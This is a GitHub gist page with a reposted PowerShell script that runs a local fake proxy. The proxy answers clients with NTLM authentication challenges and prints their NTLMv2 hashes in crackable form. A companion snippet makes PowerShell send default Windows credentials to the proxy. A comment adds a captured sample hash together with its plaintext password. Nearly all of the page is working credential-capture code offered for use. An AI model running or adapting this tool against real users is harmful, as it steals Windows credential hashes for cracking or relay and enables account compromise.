Last active
September 11, 2024 04:30
-
-
Save leftp/a3330f13ac55f584239baa68a3bb88f2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#DISCLAIMER | |
#I'm not the original author of the script... | |
#Original git repo vanished | |
function String-to-ByteArray ($String) | |
{ | |
$ByteArray=@() | |
For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
{ | |
$Chars=$String.Substring($i*2,2) | |
$Byte=[Byte] "0x$Chars" | |
$ByteArray+=$Byte | |
} | |
Return $ByteArray | |
} | |
function ByteArray-to-String ($ByteArray) | |
{ | |
ForEach ( $Byte In $ByteArray.ToString().Split(" ") ) | |
{ | |
$String="$String"+[Convert]::ToString($Byte,16).ToUpper().PadLeft(2,"0") | |
} | |
Return $String | |
} | |
function strtohex ($str) | |
{ | |
$b=$str.ToCharArray(); | |
Foreach ($element in $b) | |
{ | |
$c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element)) | |
} | |
return $c | |
} | |
function hextostr ($str) | |
{ | |
$temp="" | |
for ($i = 0; $i -lt $str.length; $i += 2) | |
{ | |
$temp1=[convert]::Toint32($str.substring($i,2),16) | |
if ($temp1 -ne 0) | |
{ | |
$temp=$temp+[char]$temp1 | |
} | |
} | |
return $temp | |
} | |
function strtonullspacedhex ($str) | |
{ | |
$b=$str.ToCharArray(); | |
Foreach ($element in $b) | |
{ | |
$c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element))+"00" | |
} | |
return $c | |
} | |
function strtohexint ($str,$length) | |
{ | |
$tmp="{0:X0}" -f $str | |
if ($tmp.length -eq 1) | |
{ | |
$tmp="0"+$tmp | |
} | |
if ($length-$tmp.length -gt 0) | |
{ | |
$tmp=$tmp+"0"*($length-$tmp.length) | |
} | |
return $tmp | |
} | |
function strlentohexint ($str,$length) | |
{ | |
$tmp="{0:X0}" -f ($str.length/2) | |
if ($tmp.length -eq 1) | |
{ | |
$tmp="0"+$tmp | |
} | |
$tmp=$tmp+"0"*($length-$tmp.length) | |
return $tmp | |
} | |
Function hextoint ($h) { | |
$string="" | |
For ( $i = 0; $i -lt ($h.Length/2); $i++ ) { | |
$string=$string+$h.substring(($h.length)-($i*2)-2,2) | |
} | |
Return [convert]::Toint32($string,16) | |
} | |
$code = "f132ae278ad7f7a0" | |
$e = "<html><head>Access Denied</head><body></body></html>" | |
$e2 = "<html><head></head><body></body></html>" | |
$nbdomainname = strtonullspacedhex("NODOMAIN") | |
$dnsdomainname = strtonullspacedhex("NODOMAIN.COM") | |
$computername = strtonullspacedhex("NO") | |
$dnscomputername = strtonullspacedhex("NO.NODOMAIN.COM") | |
$nbdomainnamelen = strlentohexint $nbdomainname 4 | |
$computernamelen = strlentohexint $computername 4 | |
$dnsdomainnamelen = strlentohexint $dnsdomainname 4 | |
$dnscomputernamelen = strlentohexint $dnscomputername 4 | |
$targetinfo = "0200"+$nbdomainnamelen+$nbdomainname+"0100"+$computernamelen+$computername+"0400"+$dnsdomainnamelen+$dnsdomainname+"0300"+$dnscomputernamelen+$dnscomputername+"0500"+$dnsdomainnamelen+$dnsdomainname+"0000"+"0000" | |
$t1=hextoint "38000000" | |
$t2=strlentohexint $nbdomainname 4 | |
$t2=hextoint $t2 | |
$t=($t1+$t2) | |
$targetinfooffset = strtohexint $t 8 | |
$targetinfolen = strlentohexint $targetinfo 4 | |
$hexcode = "4e544c4d53535000"+"02000000"+$nbdomainnamelen+$nbdomainnamelen+"38000000"+"958289e2"+$code+"0000000000000000"+$targetinfolen+$targetinfolen+$targetinfooffset+"0000000000000000"+$nbdomainname+$targetinfo | |
$Encoding = new-object system.text.asciiencoding; | |
$Buffer=new-object system.byte[] 1024; | |
$endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::loopback, 8080) | |
$listener = new-object System.Net.Sockets.TcpListener $endpoint | |
$listener.start() | |
while ($true) | |
{ | |
$client = $listener.AcceptTcpClient() | |
$Stream = $client.GetStream() | |
$reader = New-Object System.IO.StreamReader $Stream | |
$writer = New-Object System.IO.StreamWriter $Stream | |
#While($client.connected) | |
#{ | |
$Result="" | |
While($Stream.DataAvailable) | |
{ | |
$Read=$Stream.Read($Buffer,0,1024); | |
$Result+=$Encoding.GetString($Buffer, 0, $Read) | |
#$Result+=$Buffer[0..$Read] | |
} | |
if ($Result -ne "") | |
{ | |
$Result | |
if ($Result -like "CONNECT*" -or $Result -like "GET*") | |
{ | |
if ($Result -like "*Proxy-Authorization:*") | |
{ | |
$b=($Result.split("`r`n") | Select-String -Pattern ("Proxy-Authorization")).tostring() | |
$b=$b.split(" ")[$b.split(" ").length-1].split("`r`n")[0] | |
$b=[System.Convert]::FromBase64String($b) -join " " | |
$b=ByteArray-to-string $b | |
if ($b.substring(8*2,4*2) -eq "01000000") | |
{ | |
$t=string-to-bytearray $hexcode | |
$t=[System.Convert]::ToBase64String($t) | |
$res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate " + $t + "`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e | |
$writer.write($res) | |
$writer.flush() | |
} | |
if ($b.substring(8*2,4*2) -eq "03000000") | |
{ | |
$offset_NTLMresponse = hextoint $b.substring(24*2,4*2) | |
$length_NTLMresponse = hextoint $b.substring(20*2,2*2) | |
$NTProofStr = $b.substring($offset_NTLMresponse*2,16*2) | |
$NTLMresponse = $b.substring(($offset_NTLMresponse*2)+$NTProofStr.length,$length_NTLMresponse*2-$NTProofStr.length) | |
$offset_domain = hextoint $b.substring(32*2,4*2) | |
$length_domain = hextoint $b.substring(28*2,2*2) | |
$offset_user = hextoint $b.substring(40*2,4*2) | |
$length_user = hextoint $b.substring(36*2,2*2) | |
$domain = $b.substring($offset_domain*2,$length_domain*2) | |
$user = $b.substring($offset_user*2,$length_user*2) | |
$user=hextostr $user | |
$domain= hextostr $domain | |
write-host "" | |
write-host "" | |
write-host $user"::"$domain":"$code":"$NTProofStr":"$NTLMresponse | |
write-host "" | |
write-host "" | |
$res="HTTP/1.1 200 OK`r`nContent-Type: text/html`r`nContent-Length: " + $e2.length.tostring() + "`r`n`r`n" + $e2 | |
$writer.write($res) | |
$writer.flush() | |
} | |
} | |
else | |
{ | |
$res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate`r`nProxy-Authenticate: NTLM`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e | |
$writer.write($res) | |
$writer.flush() | |
} | |
} | |
} | |
#} | |
$client.Dispose() | |
$writer.Dispose() | |
$reader.Dispose() | |
$stream.Dispose() | |
} | |
$listener.stop() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#This file is an example of making powershell connect to the proxyserver localy hosted | |
$wc = New-Object System.Net.WebClient | |
$WebProxy = New-Object System.Net.WebProxy("http://127.0.0.1:8080",$true) | |
$WebProxy.UseDefaultCredentials = $true | |
$wc.Proxy = $WebProxy | |
$wc.DownloadString("http://www.google.com") |
I have a problem when it comes to the Downloadstring in your client:
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (407) Proxy Authentication Required."
At line:1 char:1
Would you happen to know the reason behind this? I tried adding "user-agent" in the header of your client code, but it didn't work.
Thanks a bunch!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Sample hash captured (p@ssw0rd).
test::LAB:f132ae278ad7f7a0:276C52359E70BDACC149CAD3586D9F1A:0101000000000000675FAA6F5CE1D2014EEA1FF39870562700000000020010004E004F0044004F004D00410049004E00010004004E004F00040018004E004F0044004F004D00410049004E002E0043004F004D0003001E004E004F002E004E004F0044004F004D00410049004E002E0043004F004D00050018004E004F0044004F004D00410049004E002E0043004F004D000800300030000000000000000100000000200000BA779BF979C51BEEE2801E863E9A05EA636A30306CD52252C1A119824B6236A10A0010000000000000000000000000000000000009001C0048005400540050002F003100320037002E0030002E0030002E0031000000000000000000